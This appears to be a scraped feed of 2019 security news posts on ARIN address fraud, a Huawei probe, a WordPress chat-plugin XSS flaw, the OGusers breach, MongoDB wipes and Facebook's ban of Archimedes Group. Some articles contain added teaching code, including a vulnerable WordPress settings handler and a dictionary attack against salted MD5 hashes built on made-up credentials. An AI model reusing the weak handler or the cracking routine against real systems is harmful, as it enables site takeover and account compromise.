This is the first arbitration under the ARIN Registration Service Contract and the related process in the US District Court for the Eastern District of Virginia. ARIN has been able to prove the existence of a complicated scheme to fraudulently acquire resources, including many legalized official attestations sent to ARIN. “A company in South Carolina obtained and utilized 11 shelf companies across the United States, and intentionally created false aliases purporting to be officers of those companies, to induce ARIN into issuing the fraudulently sought IPv4 resources and approving related transfers and reassignments of these addresses. The defrauding party was monetizing the assets obtained in the transfer market, and obtained resources under ARIN’s waiting list process.” (ARIN Press Release).

The fraudulent entity adopted an aggressive position after ARIN requested that it produce certain documents and explain its behavior. The suspects filed a motion for provisional detention orders and initial orders against ARIN in the US District Court and requested a hearing the following morning, just before Christmas. “The aggressive posture was taken after ARIN indicated its intent to revoke addresses, while permitting defrauding entity to renumber to allow existing bona fide customers not to have service interrupted,” ARIN’s General Counsel told CircleID. “The litigation was filed against ARIN to seek an injunction to stop ARIN from revoking and enter arbitration. Some addresses were transferred for money prior to that demand, others were pending transfer and were never transferred due to ARIN investigation.”

Some fraudulently obtained addresses were transferred to third parties; however, ARIN made no effort to pursue the parties that received the completed transfer, ARIN’s General Counsel told CircleID. The reason being: “(a) addresses were in another RIR service region (e.g. RIPE NCC and APNIC) and (b) ARIN did not see any evidence they knew of or participated in the fraud. In other words, they appeared to be bona fide 3rd parties.”

On May 1, 2019, ARIN obtained an arbitration award, which included revoking all fraudulent resources and $350,000 to ARIN for its legal fees.

UPDATE May 15, 2019: “Charleston Man and Business Indicted in Federal Court in Over $9M Fraud” – the United States Department of Justice issued a statement announcing that Amir Golestan, 36, of Charleston, and Micfo, LLC, were charged in federal court in a twenty-count indictment. The indictment charges twenty counts of wire fraud, with each count punishable by up to 20 years imprisonment.


The post Fraudulently Acquired IPv4 Addresses Revoked by ARIN appeared first on .

Dutch intelligence investigate alleged Huawei ‘backdoor’

Dutch intelligence services are probing Huawei for possibly spying for the Chinese government by using a “back door” in equipment of major telecoms firms.

Dutch intelligence probes Huawei for possibly spying for the Chinese government by using a “back door” in the equipment used by major telecoms firms.

Dutch intelligence shares the concerns raised by other western governments about the risks of involving the Chinese telco giant in the creation of the new 5G mobile phone infrastructure.

Since 2018, the US government has invited its allies to exclude Huawei equipment from critical infrastructure and 5G architectures.

According to Dutch newspaper De Volkskrant, the probe into Huawei is being led by the Dutch intelligence agency, AIVD.

The newspaper, citing intelligence sources, revealed that Huawei allegedly had access to the data of customers of major telecoms firms in the country, including Vodafone, KPN and T-Mobile. In April, KPN announced a partnership with Huawei to update its 4G networks.

“The report comes at a crucial time in the Netherlands, with Dutch Prime Minister Mark Rutte expected to make an imminent decision on the extent of Huawei’s involvement in the country’s 5G infrastructure.” reported the Telegraph.

AIVD did not comment on the report; its spokesman Hilbert Bredemeijer explained that the spy agency “does not comment on possible individual cases.”


Huawei continues to reject the accusations of cyber espionage; it also stressed that it is a private company not working for the Chinese intelligence apparatus.

“We do not respond to stories based on anonymous sources or speculation. We have been aware of a Task Force led by the NCTV (Ministry of Justice & Security) for some time to investigate the risks involved in the construction and use of 5G. That was previously announced in a letter from Minister Grapperhaus.” a Huawei spokesperson said.

“It is also known that the three major telecom parties are participating in the risk analysis of the vulnerability of 5G telecommunication networks. This involves looking at what measures are needed to minimize risks. We are in favor of taking general measures that can increase the resilience of telecommunications networks and that apply equally to all relevant parties. We look forward to the results of this report with confidence.”

The Dutch probe is part of a dispute between China and the United States over global trade and cyber espionage.


Thank you

Pierluigi Paganini

(SecurityAffairs – 5G, Dutch intelligence services)

The post Dutch intelligence investigate alleged Huawei ‘backdoor’ appeared first on Security Affairs.

Nothing but the truth: the legacy of George Orwell’s Nineteen Eighty-Four

Every generation turns to it in times of political turmoil, and this extract from a new book about the novel examines its relevance in the age of fake news and Trump

Read other extracts from the book:
• David Bowie’s Orwell: how Nineteen Eighty-Four shaped Diamond Dogs
• ‘He typed in bed in his dressing gown’: how Orwell wrote Nineteen Eighty-Four

December 1948. A man sits at a typewriter, in bed, on a remote island, fighting to complete the book that means more to him than any other. He is terribly ill. The book will be finished and, a year or so later, so will the man.

January 2017. Another man stands before a crowd, which is not as large as he would like, in Washington DC, taking the oath of office as the 45th president of the United States of America. His press secretary says that it was the “largest audience to ever witness an inauguration – period – both in person and around the globe”. Asked to justify such a preposterous lie, the president’s adviser describes the statement as “alternative facts”. Over the next four days, US sales of the dead man’s book will rocket by almost 10,000%, making it a No 1 bestseller.


May I have a word about… Pegasus spyware | Jonathan Bouquet

Is the powerful virus that infected WhatsApp a flying horse or a Trojan horse? Don’t ask the woman who developed it

The unsavoury revelations about the hacking of WhatsApp by software developed by Israeli company, NSO Group, raised some interesting imagery. NSO has developed a powerful smartphone virus called Pegasus, described by NSO co-founder Shalev Hulio as the company’s Trojan horse that could be sent “flying through the air” to infiltrate devices.

Right, let’s get this straight. Pegasus was the son of mortal Medusa and Poseidon, god of the sea. Pegasus and his brother Chrysaor were born from the blood of their beheaded mother, who was tricked and killed by Perseus. Pegasus was represented as a kind-hearted, gentle creature, somewhat naive but always eager to help.


Number of hacktivist attacks declined by 95 percent since 2015

According to a study conducted by IBM, the number of hacktivist attacks that caused quantifiable damage has declined by 95 percent since 2015.

Even if in Italy the cells of the popular Anonymous collective are very active, the overall number of hacktivist attacks that caused quantifiable damage to the victim has declined by 95 percent since 2015.

Researchers analyzed data collected by IBM’s X-Force threat intelligence unit between 2015 and 2019. Collected information shows a drop in the hacktivist attacks from 35 in 2015 to only 2 attacks in 2018.


However, IBM experts only collected data on hacktivist attacks that resulted in quantifiable damage.

Most of the hacktivist attacks carried out between 2015 and 2018 were attributed to Anonymous (45%), followed at a distance by Lizard Squad (9%), and DownSec and New World Hackers (4%).


“The ‘IBM X-Force Threat Intelligence Index 2019’ highlighted troubling trends in the cybersecurity landscape, including a rise in vulnerability reporting, cryptojacking attacks and attacks on critical infrastructure organizations.” reads a blog post published by IBM. “Yet amid all the concern, there is one threat trend that our data suggests has been on the decline: hacktivism — the subversive use of internet-connected devices and networks to promote a political or social agenda.”

The experts believe that the decline in the number of attacks carried out by hacktivists is caused by two major factors: a drop in attacks launched by Anonymous, and the intensification of the operations conducted by law enforcement that led to the arrests of hacktivists.

Since 2010, Anonymous has become one of the most active collectives of hacktivists in the world, reaching a peak of activity in early- to mid-2016.

At the time, Anonymous hit several high-profile organizations, but according to IBM the group started to decline “possibly due to an attrition of key leadership, differences of opinion and a struggle to find an ideological focus.”

X-Force data shows only eight Anonymous attacks in 2015 and 2016, and only one in 2018.

Arrests and legal warnings targeting hacktivists had an important deterrent effect: according to IBM, law enforcement agencies in the U.S., U.K. and Turkey have arrested at least 62 hacktivists since 2011, but the actual number could be greater.

“Three of the arrested hacktivists received sentences in 2018 and 2019, all with prison time of three years or greater, including one with a 10-year prison sentence.” continues IBM.

The alleged Anonymous member Martin Gottesfeld was accused of launching DDoS attacks in 2014 against two US healthcare organizations, the Boston Children’s Hospital and the Wayside Youth and Family Support Network.

In January, the hacktivist was sentenced to 121 months in prison and the judge ordered him to pay nearly $443,000 to compensate for the damages.

“Where are hacktivist attacks likely to go from here? We are reluctant to say that the era of hacktivism has come to an end. Acute social justice issues, greater organizational capabilities among hacktivist groups and a stronger shift to areas that lay beyond the reach of law enforcement all have the potential to dramatically change the face of hacktivism in a relatively short period of time.” concludes IBM. “More likely than not, we are experiencing a lull in hacktivist activity rather than a conclusion.”


Thank you

Pierluigi Paganini

(SecurityAffairs – hacktivist attacks, hacking)

The post Number of hacktivist attacks declined by 95 percent since 2015 appeared first on Security Affairs.

Hackers Inject Scripts in WordPress Live Chat Plugin

Site administrators using WP Live Chat Support for WordPress are advised to upgrade the plug-in to the latest version to close a persistent cross-site scripting (XSS) vulnerability that can be exploited without any authentication.

Installed on more than 60,000 websites, the plug-in is presented as a free alternative to full customer loyalty and chat solutions.

The danger of automatic attacks

Sucuri researchers discovered that versions of the plug-in earlier than 8.0.27 are susceptible to persistent XSS issues that can be exploited remotely by a hacker who does not have an account on the affected site.

Because no authentication is needed on the target site, attackers can automate their attacks and reach more victims. Given the popularity of the plugin, a flaw this easy to exploit means a large number of sites are exposed.

XSS flaws are serious because they allow an attacker to place malicious code on websites or web applications, which can then compromise visitors’ accounts or serve them modified pages.

XSS is persistent when the malicious code is added to content stored on the server, for instance user comments. When a user loads the infected page, the malicious code is parsed by the browser and the attacker’s instructions are executed.

Sucuri’s write-up explains that the vulnerability stems from an unprotected “admin_init” hook, a common attack vector for WordPress plugins.

The researchers say that the wplc_head_basic function did not use the appropriate authorization controls to update the plug-in’s settings.

“Because the ‘admin_init’ hooks can be called by visiting /wp-admin/admin-post.php or /wp-admin/admin-ajax.php, an unauthenticated attacker can use these endpoints to get the ‘wplc_custom_js’ option updated arbitrarily,” Castro details.

The content of the option is included on every page that loads live chat support, so attackers who reach a vulnerable site can insert JavaScript code into multiple pages.
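To make the authorization gap concrete, here is an added illustration (not the plugin’s own code; the `demo_` option, function and nonce names are hypothetical) of a setting saved from an `admin_init` callback with no permission check, beside a hardened version that requires a capability and a nonce and handles the save through `admin_post_{action}`, which WordPress fires only for logged-in users.

```php
<?php
/*
 * Added example, not taken from WP Live Chat Support. Everything prefixed
 * "demo_" is hypothetical. It shows why an admin_init callback on its own
 * must not be treated as proof that an administrator is making the request.
 */

// --- Weak pattern -------------------------------------------------------
// admin_init also runs when anyone, logged in or not, requests
// /wp-admin/admin-post.php or /wp-admin/admin-ajax.php. This callback
// assumes the request comes from an administrator and stores request data
// in an option that is later printed into every front-end page.
function demo_weak_save_custom_js() {
    if ( isset( $_POST['demo_custom_js'] ) ) {
        update_option( 'demo_custom_js', wp_unslash( $_POST['demo_custom_js'] ) );
    }
}
// add_action( 'admin_init', 'demo_weak_save_custom_js' ); // the pattern to avoid

// --- Hardened pattern ---------------------------------------------------
// 1. The settings form carries a nonce bound to one specific action and is
//    only rendered for users who may manage options.
function demo_render_settings_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    $current = get_option( 'demo_custom_js', '' );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="demo_save_custom_js">
        <?php wp_nonce_field( 'demo_save_custom_js', 'demo_nonce' ); ?>
        <textarea name="demo_custom_js" rows="8" cols="80"><?php echo esc_textarea( $current ); ?></textarea>
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}

// 2. The save handler hangs off admin_post_{action}, which admin-post.php
//    fires only after wp_validate_auth_cookie() succeeds. The
//    admin_post_nopriv_ variant is deliberately not registered.
add_action( 'admin_post_demo_save_custom_js', 'demo_save_custom_js' );

function demo_save_custom_js() {
    // Capability check: being logged in is not enough. Site-wide script
    // injection is reserved for roles that already hold unfiltered_html.
    if ( ! current_user_can( 'manage_options' ) || ! current_user_can( 'unfiltered_html' ) ) {
        wp_die( esc_html__( 'You are not allowed to change this setting.', 'demo' ), 403 );
    }
    // CSRF check: dies with a 403 if the nonce is missing, stale or forged.
    check_admin_referer( 'demo_save_custom_js', 'demo_nonce' );

    $value = isset( $_POST['demo_custom_js'] ) ? wp_unslash( $_POST['demo_custom_js'] ) : '';
    update_option( 'demo_custom_js', $value );

    wp_safe_redirect( add_query_arg( 'updated', '1', wp_get_referer() ?: admin_url() ) );
    exit;
}

// 3. Output side: the option is intentionally raw JavaScript chosen by an
//    administrator, so the control lives in who may write it, not here.
function demo_print_custom_js() {
    $js = get_option( 'demo_custom_js', '' );
    if ( '' !== $js ) {
        echo "<script>\n" . $js . "\n</script>\n";
    }
}
add_action( 'wp_footer', 'demo_print_custom_js' );
```

When auditing a plugin, any `update_option()` reachable from `admin_init`, `admin-ajax.php` or `admin-post.php` without both a `current_user_can()` test and a nonce check is the pattern to flag.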

Sucuri informed developers of the plug-in on April 30 and a corrected version was released on Wednesday.



The post Hackers Inject Scripts in WordPress Live Chat Plugin appeared first on .

Dozens of Linksys router models leak data useful for hackers

Dozens of Linksys router models are affected by a flaw that causes the leak of data that can be used by attackers … and the company won’t fix it.

Security researcher Troy Mursch, Chief Research Officer of Bad Packets, discovered that over 20,000 Linksys wireless routers are leaking full historical records of every device ever connected to them.

The leaked information includes devices’ unique identifiers, names, and operating systems; clearly, these data could be abused by hackers for attacks.

According to Mursch, the root cause of the data leak is a persistent vulnerability that resides in dozens of models of Linksys routers. Unfortunately, the flaw is very easy to exploit.

The devices continue to leak the information even when their firewall is turned on.

The expert used the Binary Edge IoT search engine to find vulnerable devices, earlier this week he discovered 25,617 routers that were leaking a total of 756,565 unique MAC addresses.

The disclosure of the historical records of devices that have connected to a specific router exposes the users to attacks; knowledge of MAC addresses could be abused by APT groups in targeted attacks, like the recent supply chain attack against ASUS.

The situation could be worse if owners of the routers were using default admin credentials. The issue discovered by the expert, in fact, could be used by attackers to discover if the vulnerable routers are still using default administrative passwords.

Mursch discovered that about 4,000 of the vulnerable devices were still using the default admin credentials. The vulnerable routers have remote access enabled by default, a gift for hackers, who can perform a broad range of malicious activities, such as changing DNS settings and delivering malware.

Mursch reported the flaw to Linksys, but unfortunately, the company closed the issue as “Not applicable / Won’t fix.”

Mursch published the list of vulnerable devices on Pastebin.


If you are using one of the vulnerable devices, you should replace it.



Thank you

Pierluigi Paganini

(SecurityAffairs – LinkSys, Data leak)

The post Dozens of Linksys router models leak data useful for hackers appeared first on Security Affairs.

Breaches and Bugs: How Secure are Your Family’s Favorite Apps?


Is your family feeling more vulnerable online lately? If so, you aren’t alone. The recent WhatsApp bug and social media breaches have app users thinking twice about security.

Hackers behind the recent WhatsApp malware attack, it’s reported, could record conversations, steal private messages, grab photos and location data, and turn on a device’s camera and microphone. (Is anyone else feeling like you just got caught in the middle of an episode of Homeland?)

There’s not much you and your family can do about an attack like this except to stay on top of the news, be sure to share knowledge and react promptly, and discuss device security in your home as much as possible.

How much does your family love its apps? Here’s some insight:

  • Facebook Messenger 3.408 billion downloads
  • WhatsApp 2.979 billion downloads
  • Instagram 1.843 billion downloads
  • Skype 1.039 billion downloads
  • Twitter 833.858 million downloads
  • Candy Crush 805.826 million downloads
  • Snapchat 782.837 million downloads

So, should you require your family to delete its favorite apps? Not even. A certain degree of vulnerability comes with the territory of a digital culture.

However, what you can and should do to ease that sense of vulnerability is to adopt proactive safety habits — and teach your kids — to layer up safeguards wherever possible.

Tips to Help Your Family Avoid Being Hacked

Don’t be complacent. Talk to your kids about digital responsibility and to treat each app like a potential doorway that could expose your family’s data. Take the time to sit down and teach kids how to lock down privacy settings and the importance of keeping device software updated. Counsel them not to accept data breaches as a regular part of digital life and how to fight back against online criminals with a security mindset.

Power up your passwords. Teach your kids to use unique, complex passwords for all of their apps and to use multi-factor authentication when it’s offered.

Auto update all apps. App developers regularly issue updates to fix security vulnerabilities. You can turn on auto updates in your device’s Settings.

Add extra security. If you can add a robust, easy-to-install layer of security to protect your family’s devices, why not? McAfee mobile solutions are available for both iOS and Android and will help safeguard devices from cyber threats.

Avoid suspicious links. Hackers send malicious links through text, messenger, email, pop-ups, or within the context of an ongoing conversation. Teach your kids to be aware of these tricks and not to click suspicious links or download unfamiliar content.

Share responsibly. When you use chat apps like WhatsApp or Facebook Messenger, it’s easy to forget that an outsider can access your conversation. Remind your children that nothing is private — even messaging apps that feel as if a conversation is private. Hackers are looking for personal information (birthday, address, hometown, or names of family members and pets) to crack your passwords, steal your identity, or gain access to other accounts.

What to Do If You Get Hacked

If one of your apps is compromised, act quickly to minimize the fallout. If you’ve been hacked, you may notice your device running slowly, a drain on your data, strange apps on your home screen, and evidence of calls, texts or emails you did not send.

Social media accounts. For Facebook and other social accounts, change your password immediately and alert your contacts that your account was compromised.

Review your purchase history. Check to see if there are any new apps or games installed that you didn’t authorize. You may have to cancel the credit card associated with your Google Play or iTunes account.

Revoke app access, delete old apps. Sometimes it’s not a person but a malicious app you may have downloaded that is wreaking havoc on your device. Encourage your kids to go through their apps and delete suspicious ones as well as apps they don’t use.

Bugs and breaches are part of our digital culture, but we don’t have to resign ourselves to being targets. By sharing knowledge and teaching kids to put on a security mindset, together, you can stay one step ahead of a cybercrook’s digital traps.

The post Breaches and Bugs: How Secure are Your Family’s Favorite Apps? appeared first on McAfee Blogs.

Account Hijacking Forum OGusers Hacked

Ogusers[.]com — a forum popular among people involved in hijacking online accounts and conducting SIM swapping attacks to seize control over victims’ phone numbers — has itself been hacked, exposing the email addresses, hashed passwords, IP addresses and private messages for nearly 113,000 forum users.

On May 12, the administrator of OGusers explained an outage to forum members by saying a hard drive failure had erased several months’ worth of private messages, forum posts and prestige points, and that he’d restored a backup from January 2019. Little did the administrators of OGusers know at the time, but that May 12 incident coincided with the theft of the forum’s user database, and the wiping of forum hard drives.

On May 16, the administrator of rival hacking community RaidForums announced he’d uploaded the OGusers database for anyone to download for free.

The administrator of the hacking community Raidforums on May 16 posted the database of passwords, email addresses, IP addresses and private messages of more than 113,000 users of Ogusers[.]com.

“On the 12th of May 2019 the forum was breached [and] 112,988 users were affected,” the message from RaidForums administrator Omnipotent reads. “I have uploaded the data from this database breach along with their website source files. Their hashing algorithm was the default salted MD5 which surprised me, anyway the website owner has acknowledged data corruption but not a breach so I guess I’m the first to tell you the truth. According to his statement he didn’t have any recent backups so I guess I will provide one on this thread lmfao.”

The database, a copy of which was obtained by KrebsOnSecurity, appears to hold the usernames, email addresses, hashed passwords, private messages and IP address at the time of registration for approximately 113,000 users (although many of these nicknames are likely the same people using different aliases).
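The security-relevant detail in the RaidForums post is the hashing scheme: a per-user salt defeats precomputed tables, but it does nothing against a dictionary attack run once per user at MD5 speed. The following is an added example, not code from KrebsOnSecurity or from the forum software. It assumes md5(salt + password) as the salted-MD5 construction (the page does not say which variant the forum used), builds a constructed three-user dump, cracks it with a small assumed wordlist, and then repeats the attack against the same passwords protected with PBKDF2 so the only difference is the cost of each guess.

```python
import hashlib
import hmac

SALT_LEN = 8

def md5_salted(salt: str, password: str) -> str:
    # Assumed scheme for illustration: one MD5 over salt || password.
    return hashlib.md5((salt + password).encode()).hexdigest()

def pbkdf2_salted(salt: str, password: str, iterations: int = 100_000) -> str:
    # Slow, tunable KDF: every guess costs `iterations` HMAC-SHA256 rounds instead of one MD5.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations).hex()

def make_dump(hash_fn):
    """Constructed (user, salt, digest) dump, with deterministic salts so runs are repeatable."""
    creds = [("alice", "hunter2"), ("bob", "letmein"), ("carol", "correcthorse")]
    dump = []
    for user, pw in creds:
        salt = hashlib.sha256(user.encode()).hexdigest()[:SALT_LEN]
        dump.append((user, salt, hash_fn(salt, pw)))
    return dump

# Constructed wordlist standing in for a real leaked-password list.
WORDLIST = ["password", "123456", "hunter2", "letmein", "qwerty", "monkey", "correcthorse", "dragon"]

def crack(dump, wordlist, hash_fn):
    """Per-user dictionary attack. The salt forces one pass over the wordlist per user
    (no shared rainbow table), but each pass is as cheap as the hash function allows.
    Returns ({user: password}, number_of_guesses_hashed)."""
    cracked, guesses = {}, 0
    for user, salt, digest in dump:
        for candidate in wordlist:
            guesses += 1
            if hmac.compare_digest(hash_fn(salt, candidate), digest):
                cracked[user] = candidate
                break
    return cracked, guesses

if __name__ == "__main__":
    found, n = crack(make_dump(md5_salted), WORDLIST, md5_salted)
    print(f"salted MD5: cracked {found} in {n} guesses")
    found, n = crack(make_dump(pbkdf2_salted), WORDLIST, pbkdf2_salted)
    print(f"PBKDF2:     cracked {found} in {n} guesses, each ~100,000x more expensive")
```

Both runs recover every password in the same 14 guesses; what changes is that each PBKDF2 guess costs 100,000 HMAC rounds, which is what turns a dump of weak passwords from an afternoon’s work into something an attacker has to budget for. Salting is necessary, but only a deliberately slow password hash (bcrypt, scrypt, Argon2, or PBKDF2 with a high iteration count) limits the damage when the database leaks.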

The publication of the OGuser database has caused much consternation and drama for many in the community, which has become infamous for attracting people involved in hijacking phone numbers as a method of taking over the victim’s social media, email and financial accounts, and then reselling that access for hundreds or thousands of dollars to others on the forum.

Several threads on OGusers quickly were filled with responses from anxious users concerned about being exposed by the breach. Some complained they were already receiving phishing emails targeting their OGusers accounts and email addresses. 

Meanwhile, the official Discord chat channel for OGusers has been flooded with complaints and expressions of disbelief at the hack. Members vented their anger at the main forum administrator, who uses the nickname “Ace,” claiming he altered the forum functionality after the hack to prevent users from removing their accounts. One user on the Discord chat summed it up:

“Ace be like:

- not replace broken hard drives, causing the site to time warp back four months
- not secure website, causing user info to be leaked
- disable selfban so people can’t leave”

It’s difficult not to admit feeling a bit of schadenfreude in response to this event. It’s gratifying to see such a comeuppance for a community that has largely specialized in hacking others. Also, federal and state law enforcement investigators going after SIM swappers are likely to have a field day with this database, and my guess is this leak will fuel even more arrests and charges for those involved.

Simple Mitigation Tips For Securing Android E-Readers

Android e-readers rarely make headlines when manufacturers announce their products. Yet e-ink Android tablets still sell well, because they offer more flexibility than the similarly priced Amazon Kindle e-readers. Like the Kindle, whatever book you open, the text is rendered on a sepia-toned background that mimics old paper. A setting lets you change that background to other textures and gradations such as wood, leather or a solid color. Reading on a pure white background is tiring for some people, and Android e-readers let users pick whatever background color they prefer. Users can also change the color of the text, hyperlinks and so on.

If users care about fonts, line spacing, alignment and margin control, they will love Android e-readers. There are many options for all of these, and Android has always had the edge over the Kindle when it comes to customization. Settings are applied to whatever book the user opens next. Page turning is fast and responsive, and users can read in either landscape or portrait orientation; the orientation is locked by default but can be unlocked in the settings menu. The one thing that may annoy users is the page-turning experience itself: a visible line sweeps the screen as the display refreshes each time a page is turned. This is more than a simple screen refresh, and a page turn takes a little longer than on an Amazon Kindle. As users swipe through pages, these refresh lines follow and fill the screen.

Unlike Kindle e-readers, which provide basic e-ink reading, Android e-readers are full Android tablets with an e-ink screen. That means every vulnerability affecting a regular Android device also affects an Android e-reader; by the same token, the features that keep Android secure, such as the built-in Google Play Protect anti-malware, are available on the e-reader too. The weak point of Android e-readers is that they are legacy devices: they ship with Android 4.0 Ice Cream Sandwich, with the newest models running Android 6.0 Marshmallow, which was released more than three years ago.

Android e-readers no longer occupy store shelves and are usually only available from online stores. Because Android 4.x and 6.x are old releases that no longer receive security patches from Google, a heightened level of security awareness is required to keep using such a device safely.

Here are some of our recommendations:

Only associate your Google Account if you need to access the Google Play Store
That means the Google Account does not need to stay signed in on the device. Add the account only when a new app has to be downloaded from the Play Store, and remove it afterwards. This helps preserve the security and privacy of the Google Account if the e-reader picks up malware: on an infected Android device, the associated Google Account is at risk of being used for nefarious purposes. So it is better not to have the account associated with the device when no new apps need to be installed.

Turn-off Bluetooth component if not used
Keeping the device isolated, with Bluetooth switched off, removes one channel a third party could use to push files to the e-reader.

Only use legitimate apps (never sideload)
Apps should only be installed from the official source, the Google Play Store. That way Google Play Protect scans the app before it is installed, and sideloaded packages of unknown origin never reach the device.

See if using a full Android tablet or phone will be a better experience
Evaluate whether you really need to keep using the e-reader: it runs a very old Android version that is not safe for everyday use while connected to the Internet. Replace the device with a current tablet or phone, or otherwise keep it offline rather than reachable from the public Internet.

Also, Read:

7 Android Security Features You Never Knew You Needed

Nexus and Pixel devices now has Google’s Android Security Patch

Fortnite’s Accidental Revelation of Android’s Security Weakness

Google Launches Play Protect for Android Device Security

The 6 Deadly Mobile Security Threats


Unistellar attackers already wiped over 12,000 MongoDB databases

Unistellar attackers have already wiped roughly 12,000 unsecured MongoDB databases exposed online over the past three.

Every time hackers deleted a MongoDB database they left a message asking the administrators to contact them to restore the data.

Unfortunately, the criminal practice of deleting MongoDB databases and requesting a ransom to restore the data is common; experts have observed several campaigns targeting unsecured databases exposed online.

In the last wave of attacks, crooks don’t request the payment of a specific ransom amount, instead, they provide an email contact to start a negotiation.

Bleeping Computer first reported the attacks and cited the expert Sanyam Jain as the person who discovered the deleted MongoDB databases.

“this person might be charging money in cryptocurrency according to the sensitiveness of the database.” explained Jain.

The expert discovered 12,564 unprotected MongoDB databases that had been wiped by an attacker tracked as Unistellar; he found them by searching for the text “hacked_by_unistellar” that the attacker left in the ransom message.

Running the same search on Shodan, experts at BleepingComputer found a smaller number, 7,656 databases, while my own search turned up 8,133 compromised installs exposed online.

The large number of MongoDB databases deleted by Unistellar suggests the attacker has automated the attack chain.


Jain first discovered the attacks on April 24, the note left by the Unistellar attacker reads “Restore ? Contact :

The attacker used two email addresses in these attacks, or

According to Jain, Unistellar creates restore points to restore the databases after the victims have paid the ransom.

If you manage a MongoDB instance follow the guidelines on “how to secure a MongoDB database” 
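The two settings that decide whether an instance ends up in a scan like Jain’s are the interfaces mongod binds to and whether access control is switched on; a wiped database is almost always one with no authentication listening on a public address. The following is an added example, not code from Security Affairs or from MongoDB: it parses the simple two-level layout of mongod.conf (a minimal purpose-built reader, not a YAML parser) and audits it against those two settings, using two constructed config files, one resembling the exposed instances and one hardened.

```python
WEAK_CONF = """\
# Constructed mongod.conf resembling the exposed instances: no access control,
# listening on every interface.
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 0.0.0.0
"""

HARDENED_CONF = """\
# Same host after hardening: loopback only, role-based access control on.
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 127.0.0.1
security:
  authorization: enabled
"""

def parse_mongod_conf(text: str) -> dict:
    """Parse the 'section:' / '  key: value' layout mongod.conf uses.
    Deliberately not a full YAML parser; it covers the keys audited below."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()      # drop comments
        if not line.strip():
            continue
        key, _, value = line.strip().partition(":")
        if line.startswith(" "):
            conf.setdefault(section, {})[key.strip()] = value.strip()
        else:
            section = key.strip()
            conf.setdefault(section, {})
    return conf

EXPOSED_ADDRS = {"0.0.0.0", "::", "*"}

def audit(conf: dict) -> list:
    """Return findings describing why an instance could be reached and wiped."""
    findings = []
    net = conf.get("net", {})
    if net.get("bindIpAll", "").lower() == "true":
        findings.append("net.bindIpAll is true: mongod listens on every interface")
    bind = net.get("bindIp")
    if bind is None:
        findings.append("net.bindIp not set: mongod binaries before 3.6 default to all interfaces")
    else:
        wide = [a.strip() for a in bind.split(",") if a.strip() in EXPOSED_ADDRS]
        if wide:
            findings.append(f"net.bindIp includes {','.join(wide)}: reachable from any network")
    if conf.get("security", {}).get("authorization", "").lower() != "enabled":
        findings.append("security.authorization not enabled: any client that connects has full access")
    return findings

if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit(parse_mongod_conf(text)) or "OK")
```

Binding to loopback (or a private interface) and enabling authorization closes the path Unistellar used; if the instance must be reachable over a network, the bind address should still be paired with a firewall rule, because an authenticated service on a public port is merely brute-forceable rather than open.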

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Unistellar attacks, MongoDB)

The post Unistellar attackers already wiped over 12,000 MongoDB databases appeared first on Security Affairs.

Facebook banned Archimedes Group, misinformation made in Israel

A new political misinformation campaign was uncovered and blocked by Facebook, this time it was not operated by Russia but Israel’s Archimedes Group

Facebook uncovered and blocked a misinformation campaign run by Israel’s Archimedes Group, a corporation that used fake accounts to manipulate political discussions.

According to Facebook, the Archimedes Group used hundreds of pages, accounts, and groups in the attempt to influence the public sentiment on political discussions.

The misinformation focused on specific countries in Africa (Nigeria, Senegal, Togo, Angola, Niger, and Tunisia), as well as Latin America and Southeast Asia. The operators behind the campaign posed as local people and organizations to stir up debate on specific political events.

“Today we removed 265 Facebook and Instagram accounts, Facebook Pages, Groups and events involved in coordinated inauthentic behavior. This activity originated in Israel and focused on Nigeria, Senegal, Togo, Angola, Niger and Tunisia along with some activity in Latin America and Southeast Asia.” wrote Nathaniel Gleicher, Head of cybersecurity Policy at Facebook. “The people behind this network used fake accounts to run Pages, disseminate their content and artificially increase engagement.”

Facebook banned Archimedes Group and all of its subsidiaries from its social media platforms.

Facebook shared some interesting details about the corporation’s efforts to spread fake news and reshape public perception:

  • Presence on Facebook and Instagram: 65 Facebook accounts, 161 Pages, 23 Groups, 12 events and four Instagram accounts.
  • Followers: About 2.8 million accounts followed one or more of these Pages, about 5,500 accounts joined at least one of these Groups and around 920 people followed one or more of these Instagram accounts.
  • Advertising: Around $812,000 in spending for ads on Facebook paid for in Brazilian reals, Israeli shekel, and US dollars. The first ad ran in December 2012 and the most recent ad ran in April 2019.
  • Events: Nine events were hosted by these Pages. The first was scheduled for October 2017 and the most recent was scheduled for May 2019. Up to 2,900 people expressed interest in at least one of these events, and a portion of their accounts were previously identified and disabled as fake. We cannot confirm whether any of these events actually occurred.

Facebook provided an example of the type of content that was removed: a post concerning Martin Fayulu, leader of the Engagement for Citizenship and Development party in the Democratic Republic of the Congo.
Archimedes Group spent a total of around $812,000 on Facebook ads; that figure gives an idea of the strategic importance of social networks in misinformation campaigns.

“It has repeatedly violated our misrepresentation and other policies, including by engaging in coordinated inauthentic behavior,” Facebook says. “This organization and all its subsidiaries are now banned from Facebook, and it has been issued a cease and desist letter.”

Now the question is: who paid for this campaign?



Pierluigi Paganini

(SecurityAffairs – Facebook, Archimedes Group)

The post Facebook banned Archimedes Group, misinformation made in Israel appeared first on Security Affairs.

Our Long Collective Struggle To Secure Enterprise Email

Email is one of the oldest services on the Internet. It dates from the early 1970s, almost two decades before the World Wide Web, yet the fundamentals of sending and receiving email have hardly changed: the weaknesses of the email systems of the 1970s are still hounding us today. In 1978 the first spam message was sent to hundreds of ARPANET users, and the other threats, malware and phishing delivered by email, followed soon after.

These threats take advantage of email’s basic foundation: accessibility and an open-ended approach to transferring information. Security was never part of email’s design when the fathers of the Internet first conceived it. Email grew out of the ARPANET, a network built so that scientists could share the results of their experiments and research with one another.

